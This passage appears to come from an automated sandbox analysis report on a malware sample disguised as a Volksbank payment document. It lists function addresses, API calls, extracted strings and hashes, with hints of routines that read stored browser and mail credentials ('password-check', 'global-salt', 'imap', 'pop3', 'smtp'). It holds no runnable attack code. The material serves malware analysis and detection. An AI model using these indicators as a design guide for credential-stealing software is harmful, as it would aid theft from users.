                                                                                                                                                                                                                                          Function 004091C1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004091EC
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 00409201
                                                                                                                                                                                                                                            • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                                                                                                                                                            • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                                                                                                                                            • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                                                                                                                                                          • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                                                                                                                                                          • String ID: caption$dialog_%d
                                                                                                                                                                                                                                          • API String ID: 2923679083-4161923789
                                                                                                                                                                                                                                          • Opcode ID: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                                                                                                                                                                          • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                                                                                                                                                                          Function 00426918 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • abort due to ROLLBACK, xrefs: 00428781
                                                                                                                                                                                                                                          • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                                                                                                                                                                                                          • unknown error, xrefs: 004277B2
                                                                                                                                                                                                                                          • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                                                                                                                                                                                                          • no such savepoint: %s, xrefs: 00426A02
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                                                          • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                                                                                                                                                                          • API String ID: 3510742995-3035234601
                                                                                                                                                                                                                                          • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                                                                                                                                                          • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                                                                                                                                                                                                                          Function 0042B927 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                                          • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                                                                          • API String ID: 2221118986-3608744896
                                                                                                                                                                                                                                          • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                                                                                                                                          • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                                                                                                                                                                                                                          Function 004429A4 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 259COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E
                                                                                                                                                                                                                                            • Part of subcall function 0044257F: memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcmpmemcpy
                                                                                                                                                                                                                                          • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                                                                                                                                                                          • API String ID: 1784268899-4153596280
                                                                                                                                                                                                                                          • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                                                                                                                                                          • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                                                                                                                                                                                                                                          Function 004101AF Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040FE66,00000000,00000000), ref: 004101E6
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00410246
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00410258
                                                                                                                                                                                                                                            • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0041033F
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,0040FE66,?), ref: 004103AE
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3974772901-0
                                                                                                                                                                                                                                          • Opcode ID: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                                                                                                                                                          • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                                                                                                                                                          Function 00444059 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                                                                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                                                                                                                                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                                                                                                                                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                                                                                                                                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                                                                                                                                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 004440D1
                                                                                                                                                                                                                                            • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                                                                                                                                                            • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 577244452-0
                                                                                                                                                                                                                                          • Opcode ID: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                                                                                                                                                          • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                                                                                                                                                          Function 00404487 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                                            • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 00404518
                                                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 00404536
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _strcmpi$memcpystrlen
                                                                                                                                                                                                                                          • String ID: imap$pop3$smtp
                                                                                                                                                                                                                                          • API String ID: 2025310588-821077329
                                                                                                                                                                                                                                          • Opcode ID: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                                                                                                                                                          • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                                                                                                                                                          Function 0040C00D Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040C02D
                                                                                                                                                                                                                                            • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                                                                                                                                                            • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,76940A60), ref: 00408EBE
                                                                                                                                                                                                                                            • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,76940A60), ref: 00408E31
                                                                                                                                                                                                                                            • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                                                                            • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                                                                                                                                                            • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                                                                                                                                                            • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                                                                                                                                                            • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                                                                                                            • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                                                                                                                                                            • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                                                                                                            • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                                                                                                                                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                                                                          • API String ID: 2726666094-3614832568
                                                                                                                                                                                                                                          • Opcode ID: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                                                                                                                                                          • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                                                                                                                                                          Function 00403A61 Relevance: 9.1, APIs: 6, Instructions: 57filestringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403A88
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403AA1
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00403AE9
                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1786725549-0
                                                                                                                                                                                                                                          • Opcode ID: 8b1d9e4dc4f74ac6a4b9f20da3a4dce8e7e5bfac1d9ec588bc9247bb7228e3eb
                                                                                                                                                                                                                                          • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b1d9e4dc4f74ac6a4b9f20da3a4dce8e7e5bfac1d9ec588bc9247bb7228e3eb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                                                                                                                                                                                                                          Function 0040C143 Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                                                                                                                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                                                                                                                                                          • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                                                                                                                                                          • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2014771361-0
                                                                                                                                                                                                                                          • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                                                                                                          • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                                                                                                                                                          Function 0040613B Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                                                                                                                                                                            • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                                                                                                                                                                            • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                                                                                                                                                            • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                                                                                                                                                          • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                                                                                                                                                                          • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                                                                                                                                                                          • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcmp$memcpy
                                                                                                                                                                                                                                          • String ID: global-salt$password-check
                                                                                                                                                                                                                                          • API String ID: 231171946-3927197501
                                                                                                                                                                                                                                          • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                                                                                                          • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                                                                                                                                                          Function 00443473 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                                                          • Opcode ID: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                                                                                                                                                          • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                                                                                                                                                          Function 00401694 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 004016D7
